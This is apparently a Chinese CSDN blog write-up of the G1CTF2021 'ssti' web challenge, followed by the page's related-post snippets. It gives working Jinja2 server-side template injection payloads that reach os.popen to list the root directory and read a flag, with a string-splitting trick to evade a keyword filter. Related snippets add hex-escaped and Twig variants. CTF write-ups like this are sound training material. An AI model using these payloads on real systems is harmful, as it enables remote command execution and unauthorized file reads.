[G1CTF2021]ssti

最新推荐文章于 2022-07-04 20:20:05 发布
最新推荐文章于 2022-07-04 20:20:05 发布
阅读量124 收藏
点赞数
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47940466/article/details/117200343
版权

在这里插入图片描述在括号内输入9*9可得结果 81
模板注入可参考
https://blog.csdn.net/xia739635297/article/details/104229582

{% for c in [].__class__.__base__.__subclasses__() %}
{%if%20c.__name__=='catch_warnings'%27'%}
{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}
{%endif%}
{% endfor %}

在这里插入图片描述在cat flag会遇到过滤,测试可知过滤flag,命令执行时绕过即可

{% for c in [].__class__.__base__.__subclasses__() %}
{%if%20c.__name__=='catch_warnings'%27'%}
{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /fla''g').read()")}}
{%endif%}
{% endfor %}

在这里插入图片描述

Octopus_Bro.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php沙盒绕过ctf,浅析SSTI(python沙盒绕过)
weixin_39583162的博客
04-09 875
在CTF比赛中见过不少的SSTI题目,在这里整理下思路,记录下0x01 简介SSTI(Server-Side Template Injection),即服务端模板注入攻击,通过与服务端模板的输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的,目前CTF常见的SSTI题中,大部分是考python的0x02 攻击流程攻击流程,以文件读取为例子函数解析__c...
G1CTF-2021 WP
weixin_47869330的博客
05-25 880
G1CTF2021Crypto1. One Piece2. baby_rsa3.deal_breaking4.easyRSA5.Asymmetric taskMISC1.音频隐写——newworld2.盲水印——wo3.敲击码——tiktik4.tryxorPWN欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚
[G1CTF2021]SSTI
qq_52718293的博客
05-25 248
题目打开之后是这样子,由于题目标题有提示,很容易知道这是模板注入ssti 上图可以说是模板注入的模板了 通过测试,大概可以知道是jinja2的题型 对于这种题型,构造payload 又有模板 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen
[CTF的PASSBY]浅谈FLASK-jinja2 SSTI 的绕过
qq_64201116的博客
07-04 2234
我目前了解的后端的三大语言,基于php,基于java,基于python,这篇文章就来浅浅谈谈关于python构造的flask过滤SSTI不严谨导致的SSTI注入
php沙盒绕过ctf,CTF SSTI(服务器模板注入)
weixin_33124479的博客
04-09 771
基本判断 渲染模板flask/jinjaflask SSTI的基本思路就是利用python中的魔术方法找到自己要用的函数__dict__ 保存类实例或对象实例的属性变量键值对字典__class__ 返回类型所属的对象__mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。__bases__ 返回该对象所继承的基类// __base__和__mro__都是用来寻...
绿城杯 CTF 2021 真题 (1).rar
12-07
【绿城杯 CTF 2021 真题】是一个网络安全竞赛的实战题目集,主要涉及计算机安全领域的各种挑战,旨在检验参赛者在逆向工程、密码学、Web安全、移动安全、取证分析等多个方面的技能。CTF(Capture The Flag)比赛是一...
zer0pts-CTF-2021:zer0pts CTF 2021
05-06
zer0pts CTF 2021 是一个网络安全竞赛,主要针对网络安全爱好者和专业人士,旨在提升参赛者在信息安全领域的技能和知识。此类竞赛通常包括多种挑战,如逆向工程、密码学、网络取证、Web安全等。在这个特定的案例中,...
领航杯 CTF 2021 决赛 真题 7z
12-07
领航杯 CTF 2021 决赛
中山市香山杯 2021 CTF zip
12-07
中山市香山杯 2021 CTF zip
D3CTF2021-d3dev
最新发布
11-05
附件
有关于服务端模板注入(ssti攻击)——BUUCTF - easy_tornado
ancan8807的博客
09-07 1096
打开题目出现3个链接 /flag.txt 中提示flag in /fllllllllllllag /welcome.txt 中提示 render /hints.txt 中提示 md5(cookie_secret+md5(filename)) 直接访问/fllllllllllllag失败。 百度了render可知,render是python的一个模板,他们的url都是...
[G1CTF2021]easysql
m0_47940466的博客
05-23 154
输入数字有回显 在数字前加空格则会出现hacker 所以得知过滤了空格 搜索可知空格可用注释符/* */代替 用/* */代替空格 联合注入要输入 union select 1’and//1=2//union//select//flag//from//flag//# 用1,2…去试经测试 payload: 1’and//1=2//union//select//1,2,flag//from//flag//# 即可得flag ...
buuctf pasecactf_2019]flask_ssti
qq_40800734的博客
06-29 2437
1.测试存在ssti 2.获取类型所属的对象,后面显示被过滤了,看了大佬的文章_'.这三个被过滤了,但可以用十六进制绕过 3.寻找基类 4.寻找可用引用 {{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"][0]["\x5f\x5fsubclasses\x5f\x5f"]()}} 5.接下来就是开始一系列利用了(基础不是很好,后面的待填坑)一些大佬的方法: 自己的一些总结:使用[]好像可以自动补.号 以下是等价的
SSTI注入绕过-Jinjia2模板
fatmoForE
11-29 627
题目选自NCTF2020的Master 源码如下: from jinja2 import Template from flask import Flask,request app = Flask(__name__) @app.route("/") def index(): name = request.args.get('name', 'guest') blacklist = ['%', '-', ':', '+', 'class', 'base', 'mro', '_', 'con
对于python沙箱逃逸和ssti注入的一点笔记
kuller_Yan的博客
06-13 391
from Kuller_Yan Python沙箱: 是网站在提供在线python脚本执行,而有不想用户直接使用python执行 系统命令对系统造成危害,而对Python的一个阉割版本,被阉割的版本删去了命令执行 ,服务器文件读写等相关函数和文件。 沙箱逃逸思路: 1:实现目的最终想法: ·使用OS包中的popen,system两个函数来执行shell ·使用commands模块中的方法 ·使用subprocess ·使用写文件到指定位置,再使用其他辅助手段 import os
SSTI模板注入及绕过姿势(基于Python-Jinja2)
热门推荐
Y4tacker的博客
08-02 1万+
http://xmctf.top:8962/?name={{%22%22[%22\x5f\x5fclass\x5f\x5f%22]["\x5F\x5Fbase\x5F\x5F"]["\x5F\x5Fsubclasses\x5F\x5F"]()[233]["\x5F\x5Finit\x5F\x5F"]["\x5F\x5Fglobals\x5F\x5F"]["\x5F\x5Fbuiltins\x5F\x5F"]['eval']("\x5F\x5Fimport\x5F\x5F('os'))")}}
ssti详解与例题以及绕过payload大全
HoAd'blog
02-10 9435
ssti详解与例题以及绕过payload大全 [BJDCTF2020]Cookie is so stable user=1231{{2*4}} 判断是不是ssti user={{system('ls')}} 执行命令,但不能成功,,好像是空格不可以 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 这是最后的payload https://0day.work/jinja2
swpuctf 2021 新生赛]hardrce
07-28
- *1* *2* *3* [[SWPUCTF 2021 新生赛] 第三波放题](https://blog.csdn.net/weixin_63231007/article/details/124086128)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值